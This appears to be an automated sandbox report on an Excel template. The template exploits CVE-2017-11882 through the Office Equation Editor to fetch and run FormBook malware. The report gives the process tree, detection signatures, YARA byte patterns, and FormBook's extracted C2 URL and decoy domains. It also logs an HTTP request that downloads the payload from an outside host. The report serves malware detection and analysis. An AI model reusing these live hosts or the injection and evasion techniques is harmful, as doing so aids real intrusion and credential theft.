Loading ...

Play interactive tourEdit tour

Windows Analysis Report New_1007572_021.xltx

Overview

General Information

Sample Name:New_1007572_021.xltx
Analysis ID:458850
MD5:427e80f30505c596c822c141283a5a70
SHA1:d910f9e9ecf2cb8c68f8fca4121bac4bad757a37
SHA256:d1acfa41b1e1fbc076b41547954e6615132256983b0315c50f8dbb97a0399fbd
Tags:xlsxxltx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2624 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2384 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • tynex.exe (PID: 2216 cmdline: C:\Users\Public\tynex.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
      • tynex.exe (PID: 3000 cmdline: C:\Users\user\AppData\Local\Temp\tynex.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
        • FB_BFF5.tmp.exe (PID: 2748 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe' MD5: 74BAFB3E707C7B0C63938AC200F99C7F)
        • FB_C479.tmp.exe (PID: 2724 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe' MD5: 48ECE2CA39A9EAE7FCED7418CF071D46)
          • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • cscript.exe (PID: 2248 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
              • cmd.exe (PID: 1244 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeJoeSecurity_FormBookYara detected FormBookJoe Security
    C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x88e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x956a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1a4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1b4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x17409:$sqlite3step: 68 34 1C 7B E1
      • 0x1751c:$sqlite3step: 68 34 1C 7B E1
      • 0x17438:$sqlite3text: 68 38 2A 90 C5
      • 0x1755d:$sqlite3text: 68 38 2A 90 C5
      • 0x1744b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17573:$sqlite3blob: 68 53 D8 7F 8C
      00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 34 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.0.FB_C479.tmp.exe.1340000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.0.FB_C479.tmp.exe.1340000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          7.0.FB_C479.tmp.exe.1340000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17609:$sqlite3step: 68 34 1C 7B E1
          • 0x1771c:$sqlite3step: 68 34 1C 7B E1
          • 0x17638:$sqlite3text: 68 38 2A 90 C5
          • 0x1775d:$sqlite3text: 68 38 2A 90 C5
          • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
          4.2.tynex.exe.36294d0.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            4.2.tynex.exe.36294d0.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0xe5c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0xe82a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x1a34d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x19e39:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x1a44f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1a5c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xf242:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x190b4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xff3b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x201bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x211c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 13 entries

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 160.153.129.234, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2384, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2384, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\tynex.exe, CommandLine: C:\Users\Public\tynex.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\tynex.exe, NewProcessName: C:\Users\Public\tynex.exe, OriginalFileName: C:\Users\Public\tynex.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2384, ProcessCommandLine: C:\Users\Public\tynex.exe, ProcessId: 2216
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\tynex.exe, CommandLine: C:\Users\Public\tynex.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\tynex.exe, NewProcessName: C:\Users\Public\tynex.exe, OriginalFileName: C:\Users\Public\tynex.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2384, ProcessCommandLine: C:\Users\Public\tynex.exe, ProcessId: 2216

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
            Found malware configurationShow sources
            Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exeReversingLabs: Detection: 28%
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeMetadefender: Detection: 45%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeReversingLabs: Detection: 85%
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeReversingLabs: Detection: 28%
            Source: C:\Users\Public\tynex.exeReversingLabs: Detection: 28%
            Multi AV Scanner detection for submitted fileShow sources
            Source: New_1007572_021.xltxReversingLabs: Detection: 39%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeJoe Sandbox ML: detected
            Source: C:\Users\Public\tynex.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeJoe Sandbox ML: detected
            Source: 7.0.FB_C479.tmp.exe.1340000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.2.tynex.exe.36294d0.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 7.2.FB_C479.tmp.exe.1340000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.2.tynex.exe.39186d0.6.unpackAvira: Label: TR/Crypt.XPACK.Gen2
            Source: 5.2.tynex.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.2.tynex.exe.276b818.2.unpackAvira: Label: TR/Dropper.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\tynex.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\tynex.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: wntdll.pdb source: FB_C479.tmp.exe, cscript.exe
            Source: Binary string: cscript.pdbN source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 4x nop then pop esi7_2_0135727D
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 4x nop then pop edi7_2_01357D7B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi9_2_0008727D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi9_2_00087D7B

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.domoexpra.club/cg53/
            Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
            Source: global trafficHTTP traffic detected: GET /Di4/New_1007572_021.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: inter-trading-service.comConnection: Keep-Alive
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30DB366F.jpgJump to behavior